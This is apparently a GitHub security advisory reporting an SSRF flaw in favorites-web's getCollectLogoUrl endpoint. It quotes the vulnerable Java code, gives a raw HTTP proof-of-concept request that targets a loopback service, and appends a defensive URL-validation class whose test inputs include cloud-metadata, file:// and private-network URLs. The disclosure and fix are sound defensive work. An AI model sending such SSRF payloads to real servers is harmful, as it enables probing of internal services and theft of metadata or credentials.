
SSRF vulnerability on /collect/getCollectLogoUrl #134

@NinjaGPT

Description


Summary

An SSRF vulnerability was discovered on /collect/getCollectLogoUrl in the latest version (v1.3.0) of favorites-web. The target URI parameter for network requests is user-controllable and lacks sufficient security processing, resulting in an SSRF vulnerability that allows attackers to exploit this flaw to probe and exploit internal services of the target system.

Version <= v1.3.0

Details

  • app/src/main/java/com/favorites/web/CollectController.java
@RequestMapping(value="/getCollectLogoUrl",method=RequestMethod.POST)
@LoggerManage(description="Get the LogoUrl of the bookmarked page")
public String getCollectLogoUrl(String url){
    if(StringUtils.isNotBlank(url)){
       String logoUrl = cacheService.getMap(url);
       if(StringUtils.isNotBlank(logoUrl)){
          return logoUrl;
       }else{
          return Const.default_logo;
       }
    }else{
       return Const.default_logo;
    }
}

... 
public String getMap(String key){
    if(maps.isEmpty()){
       List<UrlLibrary> collectLibrarieList = urlLibraryRepository.findAll();
        for(UrlLibrary urlLibrary : collectLibrarieList){
            maps.put(urlLibrary.getUrl(), urlLibrary.getLogoUrl());
        }
    }
    if(null == maps.get(key)){
        this.addMaps(key);
    }
    return maps.get(key);
}


public void addMaps(String key){
    if(key.contains("?")){
        key=key.substring(0,key.indexOf("?"));
    }
    String logoUrl = HtmlUtil.getImge(key);
    maps.put(key,logoUrl);
    UrlLibrary urlLibrary = new UrlLibrary();
    urlLibrary.setUrl(key);
    urlLibrary.setLogoUrl(logoUrl);
    urlLibraryRepository.save(urlLibrary);
}

public static String getImge(String url){
    String logo="";
    logo=getPageImg(url);
    if(StringUtils.isBlank(logo) || logo.length()>300){
       logo=Const.BASE_PATH + Const.default_logo;
    }
    return logo;
}
  • app/src/main/java/com/favorites/utils/HtmlUtil.java
public static String getPageImg(String url){
    String imgUrl="";
    Document doc;
    try {
       doc = Jsoup.connect(url).userAgent(Const.userAgent).get();
 

POC

POST /collect/getCollectLogoUrl HTTP/1.1
Host: 127.0.0.1:7001
sec-ch-ua: "Chromium";v="117", "Not;A=Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: en,zh;q=0.9,zh-CN;q=0.8
Cookie: JSESSIONID=E00E4984B9361172A607DE1C9834F555; Favorites_user=7rhpr7t/Ax3zf0kG+IpKo+Wg+1N9ozjr
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 24

url=http://127.0.0.1:88/

Impact

https://portswigger.net/web-security/ssrf#what-is-the-impact-of-ssrf-attacks
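Added example (not favorites-web code, and not part of the report above): in the code quoted in this issue, the `url` parameter reaches `Jsoup.connect(url)` in `HtmlUtil.getPageImg` with only a `?`-suffix strip in `addMaps`, so a destination check has to run before that call. The class and method names below are hypothetical; the check requires Java 11 or later, parses the URL with `java.net.URI`, allows only http/https, refuses embedded credentials, resolves the host and rejects any address that is loopback, unspecified, link-local, RFC 1918, multicast, CGNAT or IPv6 unique-local. The inputs in `main` are constructed; the first one mirrors the PoC body in this issue.

```java
import java.net.InetAddress;
import java.net.URI;
import java.net.URISyntaxException;
import java.net.UnknownHostException;
import java.util.Locale;
import java.util.Set;

/**
 * Hypothetical destination check to run before a user-supplied URL is handed
 * to HtmlUtil.getImge()/Jsoup.connect(). Not project code.
 */
public final class LogoFetchTargetCheck {

    private static final Set<String> ALLOWED_SCHEMES = Set.of("http", "https");

    private LogoFetchTargetCheck() {}

    /**
     * Returns the normalized URL if it is safe to fetch, otherwise throws
     * IllegalArgumentException. DNS failures surface as UnknownHostException,
     * which callers should also treat as "do not fetch".
     */
    public static String requireFetchable(String rawUrl) throws UnknownHostException {
        if (rawUrl == null || rawUrl.isBlank()) {
            throw new IllegalArgumentException("empty url");
        }
        final URI uri;
        try {
            uri = new URI(rawUrl.trim());
        } catch (URISyntaxException e) {
            throw new IllegalArgumentException("malformed url", e);
        }
        String scheme = uri.getScheme();
        if (scheme == null || !ALLOWED_SCHEMES.contains(scheme.toLowerCase(Locale.ROOT))) {
            throw new IllegalArgumentException("scheme not allowed: " + scheme);
        }
        // "http://user@host/" credentials have no place in a logo URL and are a
        // classic way to confuse naive host parsing.
        if (uri.getRawUserInfo() != null) {
            throw new IllegalArgumentException("userinfo not allowed");
        }
        String host = uri.getHost();
        if (host == null || host.isEmpty()) {
            throw new IllegalArgumentException("missing or non-server-based host");
        }
        // Check every address the name maps to, not just the first: a name that
        // answers with both a public and a private address must be refused.
        for (InetAddress addr : InetAddress.getAllByName(host)) {
            if (!isPubliclyRoutable(addr)) {
                throw new IllegalArgumentException(
                        "host resolves to a non-public address: " + addr.getHostAddress());
            }
        }
        return uri.toString();
    }

    /** Rejects loopback, unspecified, link-local, RFC 1918, multicast, CGNAT and IPv6 ULA ranges. */
    static boolean isPubliclyRoutable(InetAddress addr) {
        if (addr.isAnyLocalAddress() || addr.isLoopbackAddress() || addr.isLinkLocalAddress()
                || addr.isSiteLocalAddress() || addr.isMulticastAddress()) {
            return false;
        }
        byte[] b = addr.getAddress();
        if (b.length == 4) {
            int o1 = b[0] & 0xff, o2 = b[1] & 0xff;
            if (o1 == 0) return false;                              // 0.0.0.0/8
            if (o1 == 100 && o2 >= 64 && o2 <= 127) return false;   // 100.64.0.0/10 (CGNAT)
        } else if (b.length == 16) {
            // Java's isSiteLocalAddress() only covers the deprecated fec0::/10,
            // so unique-local fc00::/7 has to be checked by hand.
            if ((b[0] & 0xfe) == 0xfc) return false;
        }
        return true;
    }

    /** Constructed inputs; the first mirrors the PoC body in this issue. All six are rejected. */
    public static void main(String[] args) {
        String[] samples = {
                "http://127.0.0.1:88/",
                "http://[::1]/",
                "http://10.0.0.5/admin",
                "http://user@169.254.169.254/latest/meta-data/",
                "file:///etc/passwd",
                "http://[fd00::1]/",
        };
        for (String s : samples) {
            try {
                System.out.println("ALLOW  " + requireFetchable(s));
            } catch (IllegalArgumentException | UnknownHostException e) {
                System.out.println("REJECT " + s + "  (" + e.getMessage() + ")");
            }
        }
    }
}
```

Two caveats for anyone wiring this in. First, Jsoup follows redirects by default, so validating the submitted URL alone still lets a public host 302 to an internal address; call `followRedirects(false)` on the connection and apply the same check to every `Location` hop. Second, resolving the name here and again inside Jsoup is a time-of-check/time-of-use gap (DNS rebinding); if that matters for the deployment, connect to the validated IP and set the `Host` header yourself, or put the fetch behind an egress proxy that enforces the same policy. Because `addMaps` stores the result in both `maps` and `urlLibraryRepository`, the check belongs before `HtmlUtil.getImge(key)` rather than only in the controller, so that a rejected URL is never cached.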
